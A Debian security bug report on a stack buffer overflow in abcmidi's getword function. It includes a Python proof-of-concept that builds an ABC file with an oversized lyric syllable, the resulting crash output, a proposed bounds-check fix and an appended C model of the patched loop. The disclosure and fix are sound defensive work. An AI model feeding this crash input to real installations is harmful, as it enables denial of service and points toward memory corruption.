
Bug#1002860: abcmidi: Stack based buffer overflow in the getword function used by abc2midi



Package: abcmidi
Version: 20211212-1
Severity: important
Tags: security

Dear Maintainer,

There is a stack based buffer overflow in the getword function from the genmidi.c file used by abc2midi. The issue exists in the following code:

static int getword(place, w)
/* picks up next syllable out of w: field.
 * It strips out all the control codes ~ - _  * in the
 * words and sends each syllable out to the Karaoke track.
 * Using the place variable, it loops through each character
 * in the word until it encounters a space or next control
 * code. The syllstatus variable controls the loop. After,
 * the syllable is sent, it then positions the place variable
 * to the next syllable or control code.
 * inword   --> grabbing the characters in the syllable and
 *             putting them into syllable for output.
 * postword --> finished grabbing all characters
 * foundnext--> ready to repeat process for next syllable
 * empty    --> between syllables.
 *
 * The variable i keeps count of the number of characters
 * inserted into the syllable[] char for output to the
 * karaoke track. The kspace variables signals that a
 * space was encountered.
 */
int* place;
int w;
{
  char syllable[200];
  unsigned char c; /* [BY] 2012-10-03 */
  int i;
  int syllcount;
  [...]
  while ((syllstatus != postword) && (syllstatus != failed)) {
    syllable[i] = c;
    [...]
  };
  syllable[i] = '\0';
  [...]

As can be seen there is a syllable buffer of size 200. There is also a while loop that writes to this buffer. Within this loop there is no check on the index into the buffer. Therefore it is possible to write past the boundaries of the buffer, overwriting data on the stack. I wrote a small PoC script for this in Python:

#!/usr/bin/env python3

# Minimal ABC tune whose w: (lyrics) line holds one syllable of 400
# characters, which is longer than the 200-byte syllable[] buffer.
filecontent = b"""
X:
K:D
0
w::""" + b"A" * 400

with open("poc.abc", "wb") as f:
    f.write(filecontent)

This generates a poc.abc file. When the current version of abc2midi is executed on it as follows, this leads to a stack overflow:
$ abc2midi poc.abc 
4.64 December 12 2021 abc2midi
Error in line-char 2-0 : Missing Number
Warning in line-char 3-0 : No M: in header, using default
Error in line-char 4-0 : Unrecognized character: 0
Warning in line-char 5-0 : Potentially ambiguous line - either a :| repeat or a field command -- cannot distinguish.
writing MIDI file poc0.mid
*** stack smashing detected ***: terminated
Aborted


Locally I fixed this issue by adding a boundary check to the while loop as follows:

while ((syllstatus != postword) && (syllstatus != failed) && (i<199)) 

I think this should fix the issue, as there does not seem to be a case where two characters are written in the same loop iteration, and i should, according to the comment at the beginning of the function, be the number of characters inserted into this buffer.

Best regards,
Kolja

-- System Information:
Debian Release: 11.0
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-8-amd64 (SMP w/4 CPU threads)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages abcmidi depends on:
ii  libc6  2.31-13+deb11u2

abcmidi recommends no packages.

Versions of packages abcmidi suggests:
pn  abcm2ps                     <none>
ii  evince [postscript-viewer]  3.38.2-1
pn  timidity | pmidi            <none>

-- no debconf information

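The following is a reduced model of getword's syllable-copying loop with the bounds check the report proposes, added here as an illustration; it is not code from genmidi.c or from the reporter. The names getword_bounded, is_control, long_input_check and struct probe are hypothetical, and treating the ~ - _ * codes as plain syllable terminators is a simplification of the real lyric parser.

```c
#include <string.h>

#define SYLLABLE_CAP 200   /* same size as syllable[200] in getword */

/* The ~ - _ * control codes named in getword's comment. */
static int is_control(unsigned char c)
{
    return c == '~' || c == '-' || c == '_' || c == '*';
}

/* Reduced model of getword's copy loop (hypothetical reconstruction, not the
 * genmidi.c code). Copies w[*place..] into syllable until a space, a control
 * code or the end of the string. The added check stops at cap-1 stored bytes
 * so the terminator always fits; a longer run is split across calls instead
 * of overflowing. Returns bytes stored, or -1 once w is exhausted. */
static int getword_bounded(const char *w, int *place, char *syllable, int cap)
{
    int i = 0, p = *place;
    while (w[p] == ' ')                         /* "empty": between syllables */
        p++;
    if (w[p] == '\0') { *place = p; return -1; }
    while (w[p] != '\0' && w[p] != ' ' && !is_control((unsigned char)w[p])) {
        if (i >= cap - 1)                       /* the missing bounds check */
            break;
        syllable[i++] = w[p++];                 /* "inword" */
    }
    syllable[i] = '\0';                         /* "postword" */
    if (is_control((unsigned char)w[p]))        /* step over one control code */
        p++;
    *place = p;
    return i;
}

/* A guard byte directly after the buffer reveals any write past syllable[cap-1]. */
struct probe { char syllable[SYLLABLE_CAP]; char guard; };

/* Feeds a constructed run of total_len 'A's, like the w: line in the PoC.
 * Returns bytes stored, -1 if the guard or terminator was damaged, -2 if total_len does not fit. */
static int long_input_check(int total_len)
{
    struct probe pr;
    char w[1024];
    int place = 0, n;
    if (total_len < 0 || total_len >= (int)sizeof w) return -2;
    memset(w, 'A', (size_t)total_len);
    w[total_len] = '\0';
    pr.guard = 0x5a;
    n = getword_bounded(w, &place, pr.syllable, SYLLABLE_CAP);
    return (n >= 0 && pr.guard == 0x5a && pr.syllable[n] == '\0') ? n : -1;
}
```

With the check in place, the 400-character w: line from the PoC stores 199 bytes plus the terminator and leaves the guard byte untouched, whereas the original loop would keep writing past the array.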
